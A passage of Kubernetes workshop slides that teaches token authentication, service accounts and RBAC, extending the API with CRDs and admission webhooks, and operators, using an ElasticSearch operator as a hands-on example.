→ Maybe OK if we only have a few users; no way otherwise - Option 2: don't use groups; grant permissions to individual users
→ Inconvenient if we have many users and teams; error-prone - Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication with tokens - Tokens are passed as HTTP headers: `Authorization: Bearer and-then-here-comes-the-token` - Tokens can be validated through a number of different methods: - static tokens hard-coded in a file on the API server - [bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) (special case to create a cluster or join nodes) - [OpenID Connect tokens](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#openid-connect-tokens) (to delegate authentication to compatible OAuth2 providers) - service accounts (these deserve more details, coming right up!) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Service accounts - A service account is a user that exists in the Kubernetes API (it is visible with e.g. `kubectl get serviceaccounts`) - Service accounts can therefore be created / updated dynamically (they don't require hand-editing a file and restarting the API server) - A service account is associated with a set of secrets (the kind that you can view with `kubectl get secrets`) - Service accounts are generally used to grant permissions to applications, services... (as opposed to humans) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Token authentication in practice - We are going to list existing service accounts - Then we will extract the token for a given service account - And we will use that token to authenticate with the API .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Listing service accounts .exercise[ - The resource name is `serviceaccount` or `sa` for short: ```bash kubectl get sa ``` ] There should be just one service account in the default namespace: `default`. .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Finding the secret .exercise[ - List the secrets for the `default` service account: ```bash kubectl get sa default -o yaml SECRET=$(kubectl get sa default -o json | jq -r .secrets[0].name) ``` ] It should be named `default-token-XXXXX`. 
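As a side note, the token can also be extracted with a `jsonpath` expression and decoded with `base64`; a minimal sketch, equivalent to the `jq` + `openssl` pipeline used on the next slide, and relying on the `$SECRET` variable set above:

```bash
# Print the decoded service account token
kubectl get secret $SECRET -o jsonpath='{.data.token}' | base64 -d
```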
.debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Extracting the token - The token is stored in the secret, wrapped with base64 encoding .exercise[ - View the secret: ```bash kubectl get secret $SECRET -o yaml ``` - Extract the token and decode it: ```bash TOKEN=$(kubectl get secret $SECRET -o json \ | jq -r .data.token | openssl base64 -d -A) ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Using the token - Let's send a request to the API, without and with the token .exercise[ - Find the ClusterIP for the `kubernetes` service: ```bash kubectl get svc kubernetes API=$(kubectl get svc kubernetes -o json | jq -r .spec.clusterIP) ``` - Connect without the token: ```bash curl -k https://$API ``` - Connect with the token: ```bash curl -k -H "Authorization: Bearer $TOKEN" https://$API ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Results - In both cases, we will get a "Forbidden" error - Without authentication, the user is `system:anonymous` - With authentication, it is shown as `system:serviceaccount:default:default` - The API "sees" us as a different user - But neither user has any rights, so we can't do nothin' - Let's change that! .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authorization in Kubernetes - There are multiple ways to grant permissions in Kubernetes, called [authorizers](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#authorization-modules): - [Node Authorization](https://kubernetes.io/docs/reference/access-authn-authz/node/) (used internally by kubelet; we can ignore it) - [Attribute-based access control](https://kubernetes.io/docs/reference/access-authn-authz/abac/) (powerful but complex and static; ignore it too) - [Webhook](https://kubernetes.io/docs/reference/access-authn-authz/webhook/) (each API request is submitted to an external service for approval) - [Role-based access control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) (associates permissions to users dynamically) - The one we want is the last one, generally abbreviated as RBAC .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Role-based access control - RBAC allows to specify fine-grained permissions - Permissions are expressed as *rules* - A rule is a combination of: - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete... - resources (as in "API resource," like pods, nodes, services...) - resource names (to specify e.g. one specific pod instead of all pods) - in some case, [subresources](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#referring-to-resources) (e.g. 
logs are subresources of pods) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## From rules to roles to rolebindings - A *role* is an API object containing a list of *rules* Example: role "external-load-balancer-configurator" can: - [list, get] resources [endpoints, services, pods] - [update] resources [services] - A *rolebinding* associates a role with a user Example: rolebinding "external-load-balancer-configurator": - associates user "external-load-balancer-configurator" - with role "external-load-balancer-configurator" - Yes, there can be users, roles, and rolebindings with the same name - It's a good idea for 1-1-1 bindings; not so much for 1-N ones .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Cluster-scope permissions - API resources Role and RoleBinding are for objects within a namespace - We can also define API resources ClusterRole and ClusterRoleBinding - These are a superset, allowing us to: - specify actions on cluster-wide objects (like nodes) - operate across all namespaces - We can create Role and RoleBinding resources within a namespace - ClusterRole and ClusterRoleBinding resources are global .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Pods and service accounts - A pod can be associated with a service account - by default, it is associated with the `default` service account - as we saw earlier, this service account has no permissions anyway - The associated token is exposed to the pod's filesystem (in `/var/run/secrets/kubernetes.io/serviceaccount/token`) - Standard Kubernetes tooling (like `kubectl`) will look for it there - So Kubernetes tools running in a pod will automatically use the service account .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## In practice - We are going to create a service account - We will use a default cluster role (`view`) - We will bind together this role and this service account - Then we will run a pod using that service account - In this pod, we will install `kubectl` and check our permissions .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Creating a service account - We will call the new service account `viewer` (note that nothing prevents us from calling it `view`, like the role) .exercise[ - Create the new service account: ```bash kubectl create serviceaccount viewer ``` - List service accounts now: ```bash kubectl get serviceaccounts ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Binding a role to the service account - Binding a role = creating a *rolebinding* object - We will call that object `viewercanview` (but again, we could call it `view`) .exercise[ - Create the new role binding: ```bash kubectl create rolebinding viewercanview \ --clusterrole=view \ --serviceaccount=default:viewer ``` ] It's important to note a couple of details in these flags... .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Roles vs Cluster Roles - We used `--clusterrole=view` - What would have happened if we had used `--role=view`? - we would have bound the role `view` from the local namespace
(instead of the cluster role `view`) - the command would have worked fine (no error) - but later, our API requests would have been denied - This is a deliberate design decision (we can reference roles that don't exist, and create/update them later) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Users vs Service Accounts - We used `--serviceaccount=default:viewer` - What would have happened if we had used `--user=default:viewer`? - we would have bound the role to a user instead of a service account - again, the command would have worked fine (no error) - ...but our API requests would have been denied later - What's about the `default:` prefix? - that's the namespace of the service account - yes, it could be inferred from context, but... `kubectl` requires it .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Testing - We will run an `alpine` pod and install `kubectl` there .exercise[ - Run a one-time pod: ```bash kubectl run eyepod --rm -ti --restart=Never \ --serviceaccount=viewer \ --image alpine ``` - Install `curl`, then use it to install `kubectl`: ```bash apk add --no-cache curl URLBASE=https://storage.googleapis.com/kubernetes-release/release KUBEVER=$(curl -s $URLBASE/stable.txt) curl -LO $URLBASE/$KUBEVER/bin/linux/amd64/kubectl chmod +x kubectl ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Running `kubectl` in the pod - We'll try to use our `view` permissions, then to create an object .exercise[ - Check that we can, indeed, view things: ```bash ./kubectl get all ``` - But that we can't create things: ``` ./kubectl create deployment testrbac --image=nginx ``` - Exit the container with `exit` or `^D` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Testing directly with `kubectl` - We can also check for permission with `kubectl auth can-i`: ```bash kubectl auth can-i list nodes kubectl auth can-i create pods kubectl auth can-i get pod/name-of-pod kubectl auth can-i get /url-fragment-of-api-request/ kubectl auth can-i '*' services ``` - And we can check permissions on behalf of other users: ```bash kubectl auth can-i list nodes \ --as some-user kubectl auth can-i list nodes \ --as system:serviceaccount:
<namespace>:<name-of-service-account>
``` .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Where does this `view` role come from? - Kubernetes defines a number of ClusterRoles intended to be bound to users - `cluster-admin` can do *everything* (think `root` on UNIX) - `admin` can do *almost everything* (except e.g. changing resource quotas and limits) - `edit` is similar to `admin`, but cannot view or edit permissions - `view` has read-only access to most resources, except permissions and secrets *In many situations, these roles will be all you need.* *You can also customize them!* .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Customizing the default roles - If you need to *add* permissions to these default roles (or others),
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism - This happens by creating a ClusterRole with the following labels: ```yaml metadata: labels: rbac.authorization.k8s.io/aggregate-to-admin: "true" rbac.authorization.k8s.io/aggregate-to-edit: "true" rbac.authorization.k8s.io/aggregate-to-view: "true" ``` - The ClusterRole's permissions will be added to `admin`/`edit`/`view` respectively - This is particularly useful when using CustomResourceDefinitions (since Kubernetes cannot guess which resources are sensitive and which ones aren't) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Where do our permissions come from? - When interacting with the Kubernetes API, we are using a client certificate - We saw previously that this client certificate contained: `CN=kubernetes-admin` and `O=system:masters` - Let's look for these in existing ClusterRoleBindings: ```bash kubectl get clusterrolebindings -o yaml | grep -e kubernetes-admin -e system:masters ``` (`system:masters` should show up, but not `kubernetes-admin`.) - Where does this match come from? .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## The `system:masters` group - If we eyeball the output of `kubectl get clusterrolebindings -o yaml`, we'll find out! - It is in the `cluster-admin` binding: ```bash kubectl describe clusterrolebinding cluster-admin ``` - This binding associates `system:masters` with the cluster role `cluster-admin` - And the `cluster-admin` role is, basically, `root`: ```bash kubectl describe clusterrole cluster-admin ``` .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Figuring out who can do what - For auditing purposes, sometimes we want to know who can perform an action - There are a few tools to help us with that - [kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) by Aqua Security - [Review Access (aka Rakkess)](https://github.com/corneliusweig/rakkess) - Both are available as standalone programs, or as plugins for `kubectl` (`kubectl` plugins can be installed and managed with `krew`) ??? :EN:- Authentication and authorization in Kubernetes :EN:- Authentication with tokens and certificates :EN:- Authorization with RBAC (Role-Based Access Control) :EN:- Restricting permissions with Service Accounts :EN:- Working with Roles, Cluster Roles, Role Bindings, etc. :FR:- Identification et droits d'accès dans Kubernetes :FR:- Mécanismes d'identification par jetons et certificats :FR:- Le modèle RBAC *(Role-Based Access Control)* :FR:- Restreindre les permissions grâce aux *Service Accounts* :FR:- Comprendre les *Roles*, *Cluster Roles*, *Role Bindings*, etc.
.debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg)] --- name: toc-extending-the-kubernetes-api class: title Extending the Kubernetes API .nav[ [Previous section](#toc-authentication-and-authorization) | [Back to table of contents](#toc-module-2) | [Next section](#toc-operators) ] .debug[(automatically generated title slide)] --- # Extending the Kubernetes API There are multiple ways to extend the Kubernetes API. We are going to cover: - Custom Resource Definitions (CRDs) - Admission Webhooks - The Aggregation Layer .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Revisiting the API server - The Kubernetes API server is a central point of the control plane (everything connects to it: controller manager, scheduler, kubelets) - Almost everything in Kubernetes is materialized by a resource - Resources have a type (or "kind") (similar to strongly typed languages) - We can see existing types with `kubectl api-resources` - We can list resources of a given type with `kubectl get <type>
` .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating new types - We can create new types with Custom Resource Definitions (CRDs) - CRDs are created dynamically (without recompiling or restarting the API server) - CRDs themselves are resources: - we can create a new type with `kubectl create` and some YAML - we can see all our custom types with `kubectl get crds` - After we create a CRD, the new type works just like built-in types .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## A very simple CRD The YAML below describes a very simple CRD representing different kinds of coffee: ```yaml apiVersion: apiextensions.k8s.io/v1alpha1 kind: CustomResourceDefinition metadata: name: coffees.container.training spec: group: container.training version: v1alpha1 scope: Namespaced names: plural: coffees singular: coffee kind: Coffee shortNames: - cof ``` .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating a CRD - Let's create the Custom Resource Definition for our Coffee resource .exercise[ - Load the CRD: ```bash kubectl apply -f ~/container.training/k8s/coffee-1.yaml ``` - Confirm that it shows up: ```bash kubectl get crds ``` ] .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating custom resources The YAML below defines a resource using the CRD that we just created: ```yaml kind: Coffee apiVersion: container.training/v1alpha1 metadata: name: arabica spec: taste: strong ``` .exercise[ - Create a few types of coffee beans: ```bash kubectl apply -f ~/container.training/k8s/coffees.yaml ``` ] .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Viewing custom resources - By default, `kubectl get` only shows name and age of custom resources .exercise[ - View the coffee beans that we just created: ```bash kubectl get coffees ``` ] - We can improve that, but it's outside the scope of this section! .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## What can we do with CRDs? There are many possibilities! - *Operators* encapsulate complex sets of resources (e.g.: a PostgreSQL replicated cluster; an etcd cluster...
see [awesome operators](https://github.com/operator-framework/awesome-operators) and [OperatorHub](https://operatorhub.io/) to find more) - Custom use-cases like [gitkube](https://gitkube.sh/) - creates a new custom type, `Remote`, exposing a git+ssh server - deploy by pushing YAML or Helm charts to that remote - Replacing built-in types with CRDs (see [this lightning talk by Tim Hockin](https://www.youtube.com/watch?v=ji0FWzFwNhA)) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Little details - By default, CRDs are not *validated* (we can put anything we want in the `spec`) - When creating a CRD, we can pass an OpenAPI v3 schema (BETA!) (which will then be used to validate resources) - Generally, when creating a CRD, we also want to run a *controller* (otherwise nothing will happen when we create resources of that type) - The controller will typically *watch* our custom resources (and take action when they are created/updated) * Examples: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml), [YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml) * .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## (Ab)using the API server - If we need to store something "safely" (as in: in etcd), we can use CRDs - This gives us primitives to read/write/list objects (and optionally validate them) - The Kubernetes API server can run on its own (without the scheduler, controller manager, and kubelets) - By loading CRDs, we can have it manage totally different objects (unrelated to containers, clusters, etc.) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Service catalog - *Service catalog* is another extension mechanism - It's not extending the Kubernetes API strictly speaking (but it still provides new features!) - It doesn't create new types; it uses: - ClusterServiceBroker - ClusterServiceClass - ClusterServicePlan - ServiceInstance - ServiceBinding - It uses the Open service broker API .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Admission controllers - Admission controllers are another way to extend the Kubernetes API - Instead of creating new types, admission controllers can transform or vet API requests - The diagram on the next slide shows the path of an API request (courtesy of Banzai Cloud) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: pic ![API request lifecycle](images/api-request-lifecycle.png) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Types of admission controllers - *Validating* admission controllers can accept/reject the API call - *Mutating* admission controllers can modify the API request payload - Both types can also trigger additional actions (e.g. 
automatically create a Namespace if it doesn't exist) - There are a number of built-in admission controllers (see [documentation](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#what-does-each-admission-controller-do) for a list) - We can also dynamically define and register our own .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: extra-details ## Some built-in admission controllers - ServiceAccount: automatically adds a ServiceAccount to Pods that don't explicitly specify one - LimitRanger: applies resource constraints specified by LimitRange objects when Pods are created - NamespaceAutoProvision: automatically creates namespaces when an object is created in a non-existent namespace *Note: #1 and #2 are enabled by default; #3 is not.* .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Admission Webhooks - We can set up *admission webhooks* to extend the behavior of the API server - The API server will submit incoming API requests to these webhooks - These webhooks can be *validating* or *mutating* - Webhooks can be set up dynamically (without restarting the API server) - To set up a dynamic admission webhook, we create a special resource: a `ValidatingWebhookConfiguration` or a `MutatingWebhookConfiguration` - These resources are created and managed like other resources (i.e. `kubectl create`, `kubectl get`...) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Webhook Configuration - A ValidatingWebhookConfiguration or MutatingWebhookConfiguration contains: - the address of the webhook - the authentication information to use with the webhook - a list of rules - The rules indicate for which objects and actions the webhook is triggered (to avoid e.g. triggering webhooks when setting up webhooks) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## The aggregation layer - We can delegate entire parts of the Kubernetes API to external servers - This is done by creating APIService resources (check them with `kubectl get apiservices`!) - The APIService resource maps a type (kind) and version to an external service - All requests concerning that type are sent (proxied) to the external service - This allows us to have resources like CRDs, but that aren't stored in etcd - Example: `metrics-server` (storing live metrics in etcd would be extremely inefficient) - Requires significantly more work than CRDs!
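For illustration, here is roughly what the APIService registered by `metrics-server` looks like (a sketch based on the upstream manifests; the exact file shipped with your metrics-server version may differ):

```yaml
# Registers the metrics.k8s.io/v1beta1 API and proxies it to the
# metrics-server Service in kube-system (assumed names/namespace)
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  group: metrics.k8s.io
  version: v1beta1
  service:
    name: metrics-server
    namespace: kube-system
  groupPriorityMinimum: 100
  versionPriority: 100
```

Once such an object exists, it shows up in `kubectl get apiservices`, and requests for `metrics.k8s.io` resources are proxied to that Service.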
.debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Documentation - [Custom Resource Definitions: when to use them](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/) - [Custom Resources Definitions: how to use them](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/) - [Service Catalog](https://kubernetes.io/docs/concepts/extend-kubernetes/service-catalog/) - [Built-in Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/) - [Dynamic Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) - [Aggregation Layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) ??? :EN:- Extending the Kubernetes API :EN:- Custom Resource Definitions (CRDs) :EN:- The aggregation layer :EN:- Admission control and webhooks :FR:- Comment étendre l'API Kubernetes :FR:- Les CRDs *(Custom Resource Definitions)* :FR:- Extension via *aggregation layer*, *admission control*, *webhooks* .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg)] --- name: toc-operators class: title Operators .nav[ [Previous section](#toc-extending-the-kubernetes-api) | [Back to table of contents](#toc-module-2) | [Next section](#toc-resource-limits) ] .debug[(automatically generated title slide)] --- # Operators - Operators are one of the many ways to extend Kubernetes - We will define operators - We will see how they work - We will install a specific operator (for ElasticSearch) - We will use it to provision an ElasticSearch cluster .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## What are operators? *An operator represents **human operational knowledge in software,**
to reliably manage an application. — [CoreOS](https://coreos.com/blog/introducing-operators.html)* Examples: - Deploying and configuring replication with MySQL, PostgreSQL ... - Setting up Elasticsearch, Kafka, RabbitMQ, Zookeeper ... - Reacting to failures when intervention is needed - Scaling up and down these systems .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## What are they made from? - Operators combine two things: - Custom Resource Definitions - controller code watching the corresponding resources and acting upon them - A given operator can define one or multiple CRDs - The controller code (control loop) typically runs within the cluster (running as a Deployment with 1 replica is a common scenario) - But it could also run elsewhere (nothing mandates that the code run on the cluster, as long as it has API access) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Why use operators? - Kubernetes gives us Deployments, StatefulSets, Services ... - These mechanisms give us building blocks to deploy applications - They work great for services that are made of *N* identical containers (like stateless ones) - They also work great for some stateful applications like Consul, etcd ... (with the help of highly persistent volumes) - They're not enough for complex services: - where different containers have different roles - where extra steps have to be taken when scaling or replacing containers .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Use-cases for operators - Systems with primary/secondary replication Examples: MariaDB, MySQL, PostgreSQL, Redis ... - Systems where different groups of nodes have different roles Examples: ElasticSearch, MongoDB ... 
- Systems with complex dependencies (that are themselves managed with operators) Examples: Flink or Kafka, which both depend on Zookeeper .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## More use-cases - Representing and managing external resources (Example: [AWS S3 Operator](https://operatorhub.io/operator/awss3-operator-registry)) - Managing complex cluster add-ons (Example: [Istio operator](https://operatorhub.io/operator/istio)) - Deploying and managing our applications' lifecycles (more on that later) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## How operators work - An operator creates one or more CRDs (i.e., it creates new "Kinds" of resources on our cluster) - The operator also runs a *controller* that will watch its resources - Each time we create/update/delete a resource, the controller is notified (we could write our own cheap controller with `kubectl get --watch`) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## One operator in action - We will install [Elastic Cloud on Kubernetes](https://www.elastic.co/guide/en/cloud-on-k8s/current/k8s-quickstart.html), an ElasticSearch operator - This operator requires PersistentVolumes - We will install Rancher's [local path storage provisioner](https://github.com/rancher/local-path-provisioner) to automatically create these - Then, we will create an ElasticSearch resource - The operator will detect that resource and provision the cluster .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Installing a Persistent Volume provisioner (This step can be skipped if you already have a dynamic volume provisioner.) - This provisioner creates Persistent Volumes backed by `hostPath` (local directories on our nodes) - It doesn't require anything special ... - ... But losing a node = losing the volumes on that node! .exercise[ - Install the local path storage provisioner: ```bash kubectl apply -f ~/container.training/k8s/local-path-storage.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Making sure we have a default StorageClass - The ElasticSearch operator will create StatefulSets - These StatefulSets will instantiate PersistentVolumeClaims - These PVCs need to be explicitly associated with a StorageClass - Or we need to tag a StorageClass to be used as the default one .exercise[ - List StorageClasses: ```bash kubectl get storageclasses ``` ] We should see the `local-path` StorageClass. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Setting a default StorageClass - This is done by adding an annotation to the StorageClass: `storageclass.kubernetes.io/is-default-class: true` .exercise[ - Tag the StorageClass so that it's the default one: ```bash kubectl annotate storageclass local-path \ storageclass.kubernetes.io/is-default-class=true ``` - Check the result: ```bash kubectl get storageclasses ``` ] Now, the StorageClass should have `(default)` next to its name. 
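For reference, the declarative equivalent of that annotation is a StorageClass manifest along these lines (a sketch; the provisioner name matches the local path provisioner, but the manifest it actually installs may differ slightly):

```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
  annotations:
    # This annotation is what marks the StorageClass as the default one
    storageclass.kubernetes.io/is-default-class: "true"
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
```

PVCs that don't specify a `storageClassName` will then be bound through this StorageClass.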
.debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Install the ElasticSearch operator - The operator provides: - a few CustomResourceDefinitions - a Namespace for its other resources - a ValidatingWebhookConfiguration for type checking - a StatefulSet for its controller and webhook code - a ServiceAccount, ClusterRole, ClusterRoleBinding for permissions - All these resources are grouped in a convenient YAML file .exercise[ - Install the operator: ```bash kubectl apply -f ~/container.training/k8s/eck-operator.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Check our new custom resources - Let's see which CRDs were created .exercise[ - List all CRDs: ```bash kubectl get crds ``` ] This operator supports ElasticSearch, but also Kibana and APM. Cool! .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Create the `eck-demo` namespace - For clarity, we will create everything in a new namespace, `eck-demo` - This namespace is hard-coded in the YAML files that we are going to use - We need to create that namespace .exercise[ - Create the `eck-demo` namespace: ```bash kubectl create namespace eck-demo ``` - Switch to that namespace: ```bash kns eck-demo ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- class: extra-details ## Can we use a different namespace? Yes, but then we need to update all the YAML manifests that we are going to apply in the next slides. The `eck-demo` namespace is hard-coded in these YAML manifests. Why? Because when defining a ClusterRoleBinding that references a ServiceAccount, we have to indicate in which namespace the ServiceAccount is located. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Create an ElasticSearch resource - We can now create a resource with `kind: ElasticSearch` - The YAML for that resource will specify all the desired parameters: - how many nodes we want - image to use - add-ons (kibana, cerebro, ...) - whether to use TLS or not - etc. .exercise[ - Create our ElasticSearch cluster: ```bash kubectl apply -f ~/container.training/k8s/eck-elasticsearch.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Operator in action - Over the next minutes, the operator will create our ES cluster - It will report our cluster status through the CRD .exercise[ - Check the logs of the operator: ```bash stern --namespace=elastic-system operator ``` - Watch the status of the cluster through the CRD: ```bash kubectl get es -w ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Connecting to our cluster - It's not easy to use the ElasticSearch API from the shell - But let's check at least if ElasticSearch is up! .exercise[ - Get the ClusterIP of our ES instance: ```bash kubectl get services ``` - Issue a request with `curl`: ```bash curl http://`CLUSTERIP`:9200 ``` ] We get an authentication error. Our cluster is protected! 
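By the way, to give an idea of what the `eck-elasticsearch.yaml` manifest we applied contains, a minimal Elasticsearch resource for a one-node `demo` cluster could look like this (a sketch; the version number and node settings are illustrative and may not match the file we used):

```yaml
apiVersion: elasticsearch.k8s.io/v1
kind: Elasticsearch
metadata:
  name: demo
spec:
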